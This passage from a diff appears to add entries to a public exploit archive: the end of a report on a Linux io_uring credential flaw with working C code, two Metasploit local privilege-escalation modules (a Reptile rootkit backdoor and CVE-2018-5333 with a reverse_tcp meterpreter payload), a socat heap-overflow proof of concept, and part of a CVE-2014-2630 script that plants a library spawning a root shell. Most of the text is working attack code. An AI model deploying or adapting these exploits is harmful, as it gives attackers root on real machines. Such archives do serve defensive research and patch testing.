+  real_iov.iov_base = &msgbuf;
+  real_iov.iov_len = sizeof(msgbuf);
+  struct msghdr msg = {
+    .msg_name = &addr,
+    .msg_namelen = sizeof(addr),
+    .msg_iov = iov,
+    .msg_iovlen = 1,
+  };
+
+  // send netlink message via uring
+  sqes[0] = (struct io_uring_sqe) {
+    .opcode = IORING_OP_RECVMSG,
+    .fd = sock,
+    .addr = (unsigned long)&msg
+  };
+  ((int*)(sq_ring + params.sq_off.array))[0] = 0;
+  (*(int*)(sq_ring + params.sq_off.tail))++;
+  int submitted = SYSCHK(syscall(SYS_io_uring_enter, uring_fd, /*to_submit=*/1, /*min_complete=*/1, /*flags=*/IORING_ENTER_GETEVENTS, /*sig=*/NULL, /*sigsz=*/0));
+  printf("submitted %d, getevents done\n", submitted);
+  int cq_tail = *(int*)(cq_ring + params.cq_off.tail);
+  printf("cq_tail = %d\n", cq_tail);
+  if (cq_tail != 1) errx(1, "expected cq_tail==1");
+  struct io_uring_cqe *cqe = (void*)(cq_ring + params.cq_off.cqes);
+  if (cqe->res < 0) {
+    printf("result: %d (%s)\n", cqe->res, strerror(-cqe->res));
+  } else {
+    printf("result: %d\n", cqe->res);
+  }
+}
+$ gcc -Wall -pthread -o uring_sendmsg uring_sendmsg.c
+$ ip addr show dev lo
+1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
+    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
+    inet 127.0.0.1/8 scope host lo
+       valid_lft forever preferred_lft forever
+    inet6 ::1/128 scope host 
+       valid_lft forever preferred_lft forever
+$ ./uring_sendmsg 
+got userfaultfd message
+submitted 1, getevents done
+cq_tail = 1
+result: 32
+$ ip addr show dev lo
+1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
+    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
+    inet 127.0.0.1/8 scope host lo
+       valid_lft forever preferred_lft forever
+    inet 1.2.3.4/32 scope global lo
+       valid_lft forever preferred_lft forever
+    inet6 ::1/128 scope host 
+       valid_lft forever preferred_lft forever
+$ 
+==========================================================================
+
+The way I see it, the easiest way to fix this would probably be to grab a
+reference to the caller's credentials with get_current_cred() in
+io_uring_create(), then let the entry code of all the kernel worker threads
+permanently install these as their subjective credentials with override_creds().
+(Or maybe commit_creds() - that would mean that you could actually see the
+owning user of these threads in the output of something like "ps aux". On the
+other hand, I'm not sure how that impacts stuff like signal sending, so
+override_creds() might be safer.) It would mean that you can't safely use an
+io_uring instance across something like a setuid() transition that drops
+privileges, but that's probably not a big problem?
+
+While the security bug was only introduced by the addition of IORING_OP_SENDMSG,
+it would probably be beneficial to mark such a change for backporting all the
+way to v5.1, when io_uring was added - I think e.g. the SELinux hook that is
+called from rw_verify_area() has so far always attributed all the I/O operations
+to the kernel context, which isn't really a security problem, but might e.g.
+cause unexpected denials depending on the SELinux policy.
\ No newline at end of file
diff --git a/exploits/linux/local/47804.rb b/exploits/linux/local/47804.rb
new file mode 100755
index 000000000..1cda53073
--- /dev/null
+++ b/exploits/linux/local/47804.rb
@@ -0,0 +1,126 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Post::File
+  include Msf::Post::Linux::Priv
+  include Msf::Post::Linux::System
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Reptile Rootkit reptile_cmd Privilege Escalation',
+      'Description'    => %q{
+        This module uses Reptile rootkit's `reptile_cmd` backdoor executable
+        to gain root privileges using the `root` command.
+
+        This module has been tested successfully with Reptile from `master`
+        branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'f0rb1dd3n', # Reptile
+          'bcoles'     # Metasploit
+        ],
+      'DisclosureDate' => '2018-10-29', # Reptile first stable release
+      'References'     =>
+        [
+          ['URL', 'https://github.com/f0rb1dd3n/Reptile'],
+          ['URL', 'https://github.com/f0rb1dd3n/Reptile/wiki/Usage']
+        ],
+      'Platform'       => ['linux'],
+      'Arch'           => [ARCH_X86, ARCH_X64],
+      'SessionTypes'   => ['shell', 'meterpreter'],
+      'Targets'        => [['Auto', {}]],
+      'Notes'          =>
+        {
+          'Reliability' => [ REPEATABLE_SESSION ],
+          'Stability'   => [ CRASH_SAFE ]
+        },
+      'DefaultTarget'  => 0))
+    register_options [
+      OptString.new('REPTILE_CMD_PATH', [true, 'Path to reptile_cmd executable', '/reptile/reptile_cmd'])
+    ]
+    register_advanced_options [
+      OptBool.new('ForceExploit', [false, 'Override check result', false]),
+      OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
+    ]
+  end
+
+  def reptile_cmd_path
+    datastore['REPTILE_CMD_PATH']
+  end
+
+  def base_dir
+    datastore['WritableDir'].to_s
+  end
+
+  def upload(path, data)
+    print_status "Writing '#{path}' (#{data.size} bytes) ..."
+    rm_f path
+    write_file path, data
+    register_file_for_cleanup path
+  end
+
+  def upload_and_chmodx(path, data)
+    upload path, data
+    chmod path
+  end
+
+  def check
+    unless executable? reptile_cmd_path
+      vprint_error "#{reptile_cmd_path} is not executable"
+      return CheckCode::Safe
+    end
+    vprint_good "#{reptile_cmd_path} is executable"
+
+    res = cmd_exec("echo id|#{reptile_cmd_path} root").to_s.strip
+    vprint_status "Output: #{res}"
+
+    if res.include?('You have no power here!')
+      vprint_error 'Reptile kernel module is not loaded'
+      return CheckCode::Safe
+    end
+
+    unless res.include?('root')
+      vprint_error 'Reptile is not installed'
+      return CheckCode::Safe
+    end
+    vprint_good 'Reptile is installed and loaded'
+
+    CheckCode::Vulnerable
+  end
+
+  def exploit
+    unless check == CheckCode::Vulnerable
+      unless datastore['ForceExploit']
+        fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
+      end
+      print_warning 'Target does not appear to be vulnerable'
+    end
+
+    if is_root?
+      unless datastore['ForceExploit']
+        fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
+      end
+    end
+
+    unless writable? base_dir
+      fail_with Failure::BadConfig, "#{base_dir} is not writable"
+    end
+
+    payload_name = ".#{rand_text_alphanumeric 8..12}"
+    payload_path = "#{base_dir}/#{payload_name}"
+    upload_and_chmodx payload_path, generate_payload_exe
+
+    print_status 'Executing payload...'
+    res = cmd_exec "echo '#{payload_path}&' | #{reptile_cmd_path} root & echo "
+    vprint_line res
+  end
+end
\ No newline at end of file
diff --git a/exploits/linux/local/47957.rb b/exploits/linux/local/47957.rb
new file mode 100755
index 000000000..f57164512
--- /dev/null
+++ b/exploits/linux/local/47957.rb
@@ -0,0 +1,166 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = GoodRanking
+
+  include Msf::Post::File
+  include Msf::Post::Linux::Priv
+  include Msf::Post::Linux::Compile
+  include Msf::Post::Linux::System
+  include Msf::Post::Linux::Kernel
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Reliable Datagram Sockets (RDS) rds_atomic_free_op NULL pointer dereference Privilege Escalation',
+      'Description'    => %q{
+        This module attempts to gain root privileges on Linux systems by abusing
+        a NULL pointer dereference in the `rds_atomic_free_op` function in the
+        Reliable Datagram Sockets (RDS) kernel module (rds.ko).
+
+        Successful exploitation requires the RDS kernel module to be loaded.
+        If the RDS module is not blacklisted (default); then it will be loaded
+        automatically.
+
+        This exploit supports 64-bit Ubuntu Linux systems, including distributions
+        based on Ubuntu, such as Linux Mint and Zorin OS.
+
+        Target offsets are available for:
+
+        Ubuntu 16.04 kernels 4.4.0 <= 4.4.0-116-generic; and
+        Ubuntu 16.04 kernels 4.8.0 <= 4.8.0-54-generic.
+
+        This exploit does not bypass SMAP. Bypasses for SMEP and KASLR are included.
+        Failed exploitation may crash the kernel.
+
+        This module has been tested successfully on various 4.4 and 4.8 kernels.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Mohamed Ghannam', # Discovery of RDS rds_atomic_free_op null pointer dereference and DoS PoC (2018-5333)
+          'Jann Horn',       # Discovery of MAP_GROWSDOWN mmap_min_addr bypass technique and PoC code (CVE-2019-9213)
+          'wbowling',        # C exploit combining 2018-5333 and CVE-2019-9213 targeting Ubuntu 16.04 kernel 4.4.0-116-generic
+          'bcoles',          # Metasploit module and updated C exploit
+          'nstarke'          # Additional kernel offsets
+        ],
+      'DisclosureDate' => '2018-11-01',
+      'Platform'       => [ 'linux' ],
+      'Arch'           => [ ARCH_X64 ],
+      'SessionTypes'   => [ 'shell', 'meterpreter' ],
+      'Targets'        => [[ 'Auto', {} ]],
+      'Privileged'     => true,
+      'References'     =>
+        [
+          [ 'CVE', '2018-5333' ],
+          [ 'CVE', '2019-9213' ],
+          [ 'BID', '102510' ],
+          [ 'URL', 'https://gist.github.com/wbowling/9d32492bd96d9e7c3bf52e23a0ac30a4' ],
+          [ 'URL', 'https://github.com/0x36/CVE-pocs/blob/master/CVE-2018-5333-rds-nullderef.c' ],
+          [ 'URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=1792&desc=2' ],
+          [ 'URL', 'https://people.canonical.com/~ubuntu-security/cve/2018/CVE-2018-5333.html' ],
+          [ 'URL', 'https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=7d11f77f84b27cef452cee332f4e469503084737' ],
+          [ 'URL', 'https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=15133f6e67d8d646d0744336b4daa3135452cb0d' ],
+          [ 'URL', 'https://github.com/bcoles/kernel-exploits/blob/master/CVE-2018-5333/cve-2018-5333.c' ]
+        ],
+      'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' },
+      'Notes'          =>
+        {
+          'Reliability' => [ REPEATABLE_SESSION ],
+          'Stability'   => [ CRASH_OS_DOWN ],
+        },
+      'DefaultTarget'  => 0))
+    register_advanced_options [
+      OptBool.new('ForceExploit',  [ false, 'Override check result', false ]),
+      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
+    ]
+  end
+
+  def base_dir
+    datastore['WritableDir'].to_s
+  end
+
+  def check
+    arch = kernel_hardware
+    unless arch.include? 'x86_64'
+      return CheckCode::Safe("System architecture #{arch} is not supported")
+    end
+    vprint_good "System architecture #{arch} is supported"
+
+    offsets = strip_comments(exploit_data('CVE-2018-5333', 'cve-2018-5333.c')).scan(/kernels\[\] = \{(.+?)\};/m).flatten.first
+    kernels = offsets.scan(/"(.+?)"/).flatten
+
+    version = "#{kernel_release} #{kernel_version.split(' ').first}"
+    unless kernels.include? version
+      return CheckCode::Safe("Linux kernel #{version} is not vulnerable")
+    end
+    vprint_good "Linux kernel #{version} is vulnerable"
+
+    if smap_enabled?
+      return CheckCode::Safe('SMAP is enabled')
+    end
+    vprint_good 'SMAP is not enabled'
+
+    if lkrg_installed?
+      return CheckCode::Safe('LKRG is installed')
+    end
+    vprint_good 'LKRG is not installed'
+
+    if grsec_installed?
+      return CheckCode::Safe('grsecurity is in use')
+    end
+    vprint_good 'grsecurity is not in use'
+
+    unless kernel_modules.include? 'rds'
+      vprint_warning 'rds.ko kernel module is not loaded, but may be autoloaded during exploitation'
+      return CheckCode::Detected('rds.ko kernel module is not loaded, but may be autoloaded during exploitation')
+    end
+    vprint_good 'rds.ko kernel module is loaded'
+
+    CheckCode::Appears
+  end
+
+  def exploit
+    unless [CheckCode::Detected, CheckCode::Appears].include? check
+      unless datastore['ForceExploit']
+        fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
+      end
+      print_warning 'Target does not appear to be vulnerable'
+    end
+
+    if is_root?
+      unless datastore['ForceExploit']
+        fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
+      end
+    end
+
+    unless writable? base_dir
+      fail_with Failure::BadConfig, "#{base_dir} is not writable"
+    end
+
+    exploit_path = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"
+
+    if live_compile?
+      vprint_status 'Live compiling exploit on system...'
+      upload_and_compile exploit_path, exploit_data('CVE-2018-5333', 'cve-2018-5333.c')
+    else
+      vprint_status 'Dropping pre-compiled exploit on system...'
+      upload_and_chmodx exploit_path, exploit_data('CVE-2018-5333', 'cve-2018-5333.out')
+    end
+    register_file_for_cleanup exploit_path
+
+    payload_path = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"
+    upload_and_chmodx payload_path, generate_payload_exe
+    register_file_for_cleanup payload_path
+
+    # mincore KASLR bypass is usually fast, but can sometimes take up to 30 seconds to complete
+    timeout = 30
+    print_status "Launching exploit (timeout: #{timeout})..."
+    output = cmd_exec("echo '#{payload_path} & exit' | #{exploit_path}", nil, timeout)
+    output.each_line { |line| vprint_status line.chomp }
+  end
+end
\ No newline at end of file
diff --git a/exploits/linux/local/47999.txt b/exploits/linux/local/47999.txt
new file mode 100644
index 000000000..68fd67332
--- /dev/null
+++ b/exploits/linux/local/47999.txt
@@ -0,0 +1,182 @@
+# Exploit Title: Socat 1.7.3.4 - Heap Based Overflow (PoC)
+# Date: 2020-02-03
+# Exploit Author: hieubl from HPT Cyber Security
+# Vendor Homepage: http://www.dest-unreach.org/
+# Software Link: http://www.dest-unreach.org/socat/
+# Version: 1.7.3.4
+# Tested on: Ubuntu 16.04.6 LTS
+# CVE :
+
+# Heap-Based Overflow due to Integer Overflow and Lack of PIE mitigation (PoC)
+
+------- [***Description***] -------
+The source code of socat.c contains _socat() function which has the
+Integer Overflow vulnerability:
+int _socat(void) {
+    ...
+    unsigned char *buff;
+    ...
+    buff = Malloc(2*socat_opts.bufsiz+1)
+    ...
+}
+
+After that, the the line of code "if ((bytes2 = xiotransfer(sock2,
+sock1, &buff, socat_opts.bufsiz, true)) < 0) {" calls the
+xiotransfer() function. The xiotransfer() function calls xioread()
+function. Finally xioread() function calls Read() function.
+
+ssize_t xioread(xiofile_t *file, void *buff, size_t bufsiz) {
+
+    ...
+    Read(pipe->fd, buff, bufsiz); //[***!!!This line of code leads to
+Heap-Based Overflow vulnerability***!!!]
+    ...
+}
+
+In addition, the "Makefile" file does not turn on the Position
+Independent Executables (PIE) mitigation (the CFLAGS does not contains
+"-pie" flag). By default, Ubuntu 16.04 does not turn on this
+mitigation. Consequently, it is easier to exploit the program, may
+even lead to Remode Code Execution (RCE).
+Reference: https://hackerone.com/reports/415272, $100 bounty for Linux
+Desktop application slack executable does not use pie / no ASLR
+
+------- [***Download and build***] -------
+Download link: http://www.dest-unreach.org/socat/download/socat-1.7.3.4.tar.gz
+$ tar xzvf socat-1.7.3.4.tar.gz
+$ cd socat-1.7.3.4/
+$ ./configure
+Modify "Makefile" file: "CFLAGS = -g -O -D_GNU_SOURCE -Wall
+-Wno-parentheses $(CCOPTS) $(DEFS) $(CPPFLAGS)" (add "-g" flag for
+debugging purpose)
+$ make
+$ sudo make install
+
+------- [***Proof of Concept***] -------
+$ checksec socat
+[*] '/home/natsu/temp/socat-1.7.3.4/socat'
+    Arch:     amd64-64-little
+    RELRO:    Partial RELRO
+    Stack:    Canary found
+    NX:       NX enabled
+    PIE:      No PIE (0x400000)
+    FORTIFY:  Enabled
+>>> There is no PIE mitigation!
+
+$ python -c 'print "A"*1000000' > a
+$ touch b
+$ socat -b9223372036854775888 OPEN:a,readbytes=1000000 OPEN:b,readbytes=1000000
+
+This proof of concept triggers the bugs by setting the buffer size to
+0x8000000000000050(9223372036854775888 in decimal). Therefore, the malloc
+size is passed to "Malloc(2*socat_opts.bufsiz+1)" is 0x100000000000000a0.
+This is equivalent to Malloc(0xa0). The readbytes("readbytes=1000000")
+controls the size of reading (we cannot read with the size too large as
+0x8000000000000050) with these lines of code: if (pipe->readbytes) { if
+(pipe->actbytes == 0) { return 0; } if (pipe->actbytes < bufsiz) { bufsiz =
+pipe->actbytes; } } ------- [***Crash logs***] ------- *** Error in
+`socat': free(): invalid next size (normal): 0x000000000106a110 ***
+======= Backtrace: =========
+/lib/x86_64-linux-gnu/libc.so.6(+0x777e5)[0x7fc0ee5817e5]
+/lib/x86_64-linux-gnu/libc.so.6(+0x8037a)[0x7fc0ee58a37a]
+/lib/x86_64-linux-gnu/libc.so.6(cfree+0x4c)[0x7fc0ee58e53c]
+socat[0x407e3f]
+socat[0x4084c6]
+socat[0x408f7a]
+/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf0)[0x7fc0ee52a830]
+socat[0x4057a9]
+======= Memory map: ========
+00400000-0044a000 r-xp 00000000 08:01 655643
+/usr/local/bin/socat
+00649000-0064a000 r--p 00049000 08:01 655643
+/usr/local/bin/socat
+0064a000-0064b000 rw-p 0004a000 08:01 655643
+/usr/local/bin/socat
+0064b000-0068c000 rw-p 00000000 00:00 0
+01069000-0108a000 rw-p 00000000 00:00 0
+ [heap]
+7fc0e8000000-7fc0e8021000 rw-p 00000000 00:00 0
+7fc0e8021000-7fc0ec000000 ---p 00000000 00:00 0
+7fc0eded3000-7fc0edee9000 r-xp 00000000 08:01 397801
+/lib/x86_64-linux-gnu/libgcc_s.so.1
+7fc0edee9000-7fc0ee0e8000 ---p 00016000 08:01 397801
+/lib/x86_64-linux-gnu/libgcc_s.so.1
+7fc0ee0e8000-7fc0ee0e9000 rw-p 00015000 08:01 397801
+/lib/x86_64-linux-gnu/libgcc_s.so.1
+7fc0ee0e9000-7fc0ee0ec000 r-xp 00000000 08:01 397787
+/lib/x86_64-linux-gnu/libdl-2.23.so
+7fc0ee0ec000-7fc0ee2eb000 ---p 00003000 08:01 397787
+/lib/x86_64-linux-gnu/libdl-2.23.so
+7fc0ee2eb000-7fc0ee2ec000 r--p 00002000 08:01 397787
+/lib/x86_64-linux-gnu/libdl-2.23.so
+7fc0ee2ec000-7fc0ee2ed000 rw-p 00003000 08:01 397787
+/lib/x86_64-linux-gnu/libdl-2.23.so
+7fc0ee2ed000-7fc0ee305000 r-xp 00000000 08:01 397909
+/lib/x86_64-linux-gnu/libpthread-2.23.so
+7fc0ee305000-7fc0ee504000 ---p 00018000 08:01 397909
+/lib/x86_64-linux-gnu/libpthread-2.23.so
+7fc0ee504000-7fc0ee505000 r--p 00017000 08:01 397909
+/lib/x86_64-linux-gnu/libpthread-2.23.so
+7fc0ee505000-7fc0ee506000 rw-p 00018000 08:01 397909
+/lib/x86_64-linux-gnu/libpthread-2.23.so
+7fc0ee506000-7fc0ee50a000 rw-p 00000000 00:00 0
+7fc0ee50a000-7fc0ee6ca000 r-xp 00000000 08:01 397763
+/lib/x86_64-linux-gnu/libc-2.23.so
+7fc0ee6ca000-7fc0ee8ca000 ---p 001c0000 08:01 397763
+/lib/x86_64-linux-gnu/libc-2.23.so
+7fc0ee8ca000-7fc0ee8ce000 r--p 001c0000 08:01 397763
+/lib/x86_64-linux-gnu/libc-2.23.so
+7fc0ee8ce000-7fc0ee8d0000 rw-p 001c4000 08:01 397763
+/lib/x86_64-linux-gnu/libc-2.23.so
+7fc0ee8d0000-7fc0ee8d4000 rw-p 00000000 00:00 0
+7fc0ee8d4000-7fc0eeaef000 r-xp 00000000 08:01 397619
+/lib/x86_64-linux-gnu/libcrypto.so.1.0.0
+7fc0eeaef000-7fc0eecee000 ---p 0021b000 08:01 397619
+/lib/x86_64-linux-gnu/libcrypto.so.1.0.0
+7fc0eecee000-7fc0eed0a000 r--p 0021a000 08:01 397619
+/lib/x86_64-linux-gnu/libcrypto.so.1.0.0
+7fc0eed0a000-7fc0eed16000 rw-p 00236000 08:01 397619
+/lib/x86_64-linux-gnu/libcrypto.so.1.0.0
+7fc0eed16000-7fc0eed19000 rw-p 00000000 00:00 0
+7fc0eed19000-7fc0eed77000 r-xp 00000000 08:01 397620
+/lib/x86_64-linux-gnu/libssl.so.1.0.0
+7fc0eed77000-7fc0eef77000 ---p 0005e000 08:01 397620
+/lib/x86_64-linux-gnu/libssl.so.1.0.0
+7fc0eef77000-7fc0eef7b000 r--p 0005e000 08:01 397620
+/lib/x86_64-linux-gnu/libssl.so.1.0.0
+7fc0eef7b000-7fc0eef82000 rw-p 00062000 08:01 397620
+/lib/x86_64-linux-gnu/libssl.so.1.0.0
+7fc0eef82000-7fc0eef84000 r-xp 00000000 08:01 397944
+/lib/x86_64-linux-gnu/libutil-2.23.so
+7fc0eef84000-7fc0ef183000 ---p 00002000 08:01 397944
+/lib/x86_64-linux-gnu/libutil-2.23.so
+7fc0ef183000-7fc0ef184000 r--p 00001000 08:01 397944
+/lib/x86_64-linux-gnu/libutil-2.23.so
+7fc0ef184000-7fc0ef185000 rw-p 00002000 08:01 397944
+/lib/x86_64-linux-gnu/libutil-2.23.so
+7fc0ef185000-7fc0ef18c000 r-xp 00000000 08:01 397917
+/lib/x86_64-linux-gnu/librt-2.23.so
+7fc0ef18c000-7fc0ef38b000 ---p 00007000 08:01 397917
+/lib/x86_64-linux-gnu/librt-2.23.so
+7fc0ef38b000-7fc0ef38c000 r--p 00006000 08:01 397917
+/lib/x86_64-linux-gnu/librt-2.23.so
+7fc0ef38c000-7fc0ef38d000 rw-p 00007000 08:01 397917
+/lib/x86_64-linux-gnu/librt-2.23.so
+7fc0ef38d000-7fc0ef3b3000 r-xp 00000000 08:01 397735
+/lib/x86_64-linux-gnu/ld-2.23.so
+7fc0ef594000-7fc0ef59a000 rw-p 00000000 00:00 0
+7fc0ef5b1000-7fc0ef5b2000 rw-p 00000000 00:00 0
+7fc0ef5b2000-7fc0ef5b3000 r--p 00025000 08:01 397735
+/lib/x86_64-linux-gnu/ld-2.23.so
+7fc0ef5b3000-7fc0ef5b4000 rw-p 00026000 08:01 397735
+/lib/x86_64-linux-gnu/ld-2.23.so
+7fc0ef5b4000-7fc0ef5b5000 rw-p 00000000 00:00 0
+7ffe11dd9000-7ffe11dfa000 rw-p 00000000 00:00 0
+ [stack]
+7ffe11dfb000-7ffe11dfe000 r--p 00000000 00:00 0
+ [vvar]
+7ffe11dfe000-7ffe11e00000 r-xp 00000000 00:00 0
+ [vdso]
+ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0
+ [vsyscall]
+2020/02/04 05:33:00 socat[47233] E exiting on signal 6
\ No newline at end of file
diff --git a/exploits/linux/local/48000.sh b/exploits/linux/local/48000.sh
new file mode 100755
index 000000000..9326f27ad
--- /dev/null
+++ b/exploits/linux/local/48000.sh
@@ -0,0 +1,3684 @@
+# Exploit Title: xglance-bin 11.00 - Privilege Escalation
+# Exploit Author: Robert Jaroszuk and Marco Ortisi (RedTimmy Security)
+# Date: 2020-02-01
+# Tested on: RHEL 5.x/6.x/7.x/8.x
+# CVE: CVE-2014-2630
+# Disclamer: This exploit is for educational purpose only
+# More details on https://redtimmysec.wordpress.com/2020/02/04/perf-exploiter/
+#
+
+#!/bin/sh
+
+echo "[*] Hewlett-Packard Performance Monitoring for Open System Environments exploit by Robert Jaroszuk and Marco Ortisi (RedTimmy Security)"
+echo
+echo "[+] Preparing the code..."
+
+cat > lib.c << DONE
+
+#define _GNU_SOURCE
+#include <unistd.h>
+#include <stdlib.h>
+#include <sys/types.h>
+#include <stdio.h>
+#include <dlfcn.h>
+
+void __cxa_finalize (void *d) {
+    return;
+}
+
+void __attribute__((constructor)) init() {
+    setresuid(geteuid(), geteuid(), geteuid());
+    printf("Hewlett-Packard Performance Monitoring for Open System Environments exploit by Robert Jaroszuk and Marco Ortisi (RedTimmy Security)\n");
+    printf("CVE-2014-2630\n");
+    fflush(stdout);
+    execl("/bin/sh", (char *)NULL, (char *)NULL);
+}
+
+int applicationShellClassRec = 0;
+int applicationShellWidgetClass = 0;
+int colorConvertArgs = 0;
+int compositeWidgetClass = 0;
+int constraintClassRec = 0;
+int constraintWidgetClass = 0;
+int coreWidgetClass = 0;
+int dump_external = 0;
+int dump_fontlist = 0;
+int dump_fontlist_cache = 0;
+int dump_internal = 0;
+int FcPatternAddInteger = 0;
+int FcPatternAddString = 0;
+int FcPatternCreate = 0;
+int FcPatternDestroy = 0;
+int GetWidgetNavigPtrs = 0;
+int InitializeScrollBars = 0;
+int _ITM_deregisterTMCloneTable = 0;
+int _ITM_registerTMCloneTable = 0;
+int jpeg_calc_output_dimensions = 0;
+int jpeg_CreateDecompress = 0;
+int jpeg_destroy_decompress = 0;
+int jpeg_finish_decompress = 0;
+int jpeg_read_header = 0;
+int jpeg_read_scanlines = 0;
+int jpeg_start_decompress = 0;
+int jpeg_std_error = 0;
+int jpeg_stdio_src = 0;
+int load_jpeg = 0;
+int localeconv = 0;
+int __longjmp_chk = 0;
+int nl_langinfo = 0;
+int NumLockMask = 0;
+int objectClass = 0;
+int objectClassRec = 0;
+int overrideShellClassRec = 0;
+int png_create_info_struct = 0;
+int png_create_read_struct = 0;
+int png_destroy_read_struct = 0;
+int png_get_channels = 0;
+int png_get_gAMA = 0;
+int png_get_IHDR = 0;
+int png_get_rowbytes = 0;
+int png_get_valid = 0;
+int png_init_io = 0;
+int png_read_end = 0;
+int png_read_image = 0;
+int png_read_info = 0;
+int png_read_update_info = 0;
+int png_set_expand = 0;
+int png_set_gamma = 0;
+int png_set_gray_to_rgb = 0;
+int png_set_longjmp_fn = 0;
+int png_set_sig_bytes = 0;
+int png_set_strip_16 = 0;
+int png_sig_cmp = 0;
+int rectObjClass = 0;
+int rectObjClassRec = 0;
+int ScrollLockMask = 0;
+int SetMwmStuff = 0;
+int T = 0;
+int topLevelShellWidgetClass = 0;
+int transientShellClassRec = 0;
+int transientShellWidgetClass = 0;
+int V = 0;
+int vendorShellClassRec = 0;
+int vendorShellWidgetClass = 0;
+int W = 0;
+int __wctomb_chk = 0;
+int widgetClass = 0;
+int widgetClassRec = 0;
+int wmShellClassRec = 0;
+int wmShellWidgetClass = 0;
+int XAddExtension = 0;
+int XAllocColor = 0;
+int XAllocColorCells = 0;
+int XAllowEvents = 0;
+int XBell = 0;
+int XChangeActivePointerGrab = 0;
+int XChangeGC = 0;
+int XChangeProperty = 0;
+int XChangeWindowAttributes = 0;
+int XCheckIfEvent = 0;
+int XCheckMaskEvent = 0;
+int XClearArea = 0;
+int XClearWindow = 0;
+int XCloseDisplay = 0;
+int XCloseIM = 0;
+int XConfigureWindow = 0;
+int XConvertSelection = 0;
+int XCopyArea = 0;
+int XCopyPlane = 0;
+int XCreateBitmapFromData = 0;
+int XCreateFontCursor = 0;
+int XCreateGC = 0;
+int XCreateIC = 0;
+int XCreateImage = 0;
+int XCreatePixmap = 0;
+int XCreatePixmapCursor = 0;
+int XCreatePixmapFromBitmapData = 0;
+int XCreateRegion = 0;
+int XCreateWindow = 0;
+int XDefaultColormap = 0;
+int XDefaultDepth = 0;
+int XDefaultScreen = 0;
+int XDefaultVisual = 0;
+int XDefineCursor = 0;
+int XDeleteContext = 0;
+int XDeleteProperty = 0;
+int XDestroyIC = 0;
+int XDestroyRegion = 0;
+int XDestroyWindow = 0;
+int XDisplayKeycodes = 0;
+int XDisplayOfScreen = 0;
+int XDisplayString = 0;
+int XDrawArc = 0;
+int XDrawImageString = 0;
+int XDrawImageString16 = 0;
+int XDrawLine = 0;
+int XDrawLines = 0;
+int XDrawPoint = 0;
+int XDrawRectangle = 0;
+int XDrawSegments = 0;
+int XDrawString = 0;
+int XDrawString16 = 0;
+int _XEditResGet16 = 0;
+int _XEditResGet32 = 0;
+int _XEditResGet8 = 0;
+int _XEditResGetSigned16 = 0;
+int _XEditResGetString8 = 0;
+int _XEditResGetWidgetInfo = 0;
+int _XEditResPut16 = 0;
+int _XEditResPut32 = 0;
+int _XEditResPut8 = 0;
+int _XEditResPutString8 = 0;
+int _XEditResPutWidgetInfo = 0;
+int _XEditResResetStream = 0;
+int XEmptyRegion = 0;
+int XEqualRegion = 0;
+int XESetCloseDisplay = 0;
+int XExtentsOfFontSet = 0;
+int XFetchBuffer = 0;
+int XFillArc = 0;
+int XFillPolygon = 0;
+int XFillRectangle = 0;
+int XFillRectangles = 0;
+int XFindContext = 0;
+int XFlush = 0;
+int XFontsOfFontSet = 0;
+int XFree = 0;
+int XFreeColors = 0;
+int XFreeCursor = 0;
+int XFreeFont = 0;
+int XFreeFontNames = 0;
+int XFreeGC = 0;
+int XFreeModifiermap = 0;
+int XFreePixmap = 0;
+int XFreeStringList = 0;
+int XftDrawCreate = 0;
+int XftDrawCreateBitmap = 0;
+int XftDrawDestroy = 0;
+int XftDrawRect = 0;
+int XftDrawSetClip = 0;
+int XftDrawSetClipRectangles = 0;
+int XftDrawString16 = 0;
+int XftDrawString32 = 0;
+int XftDrawStringUtf8 = 0;
+int XftFontClose = 0;
+int XftFontMatch = 0;
+int XftFontOpenPattern = 0;
+int XftTextExtents16 = 0;
+int XftTextExtents32 = 0;
+int XftTextExtents8 = 0;
+int XftTextExtentsUtf8 = 0;
+int XGetAtomName = 0;
+int XGetFontProperty = 0;
+int XGetGCValues = 0;
+int XGetGeometry = 0;
+int XGetICValues = 0;
+int XGetImage = 0;
+int XGetIMValues = 0;
+int XGetInputFocus = 0;
+int XGetKeyboardMapping = 0;
+int XGetModifierMapping = 0;
+int XGetOCValues = 0;
+int XGetOMValues = 0;
+int XGetSelectionOwner = 0;
+int XGetWindowAttributes = 0;
+int XGetWindowProperty = 0;
+int XGetWMColormapWindows = 0;
+int XGrabKeyboard = 0;
+int XGrabPointer = 0;
+int XGrabServer = 0;
+int XHeightOfScreen = 0;
+int xiColumnConstraintExtension = 0;
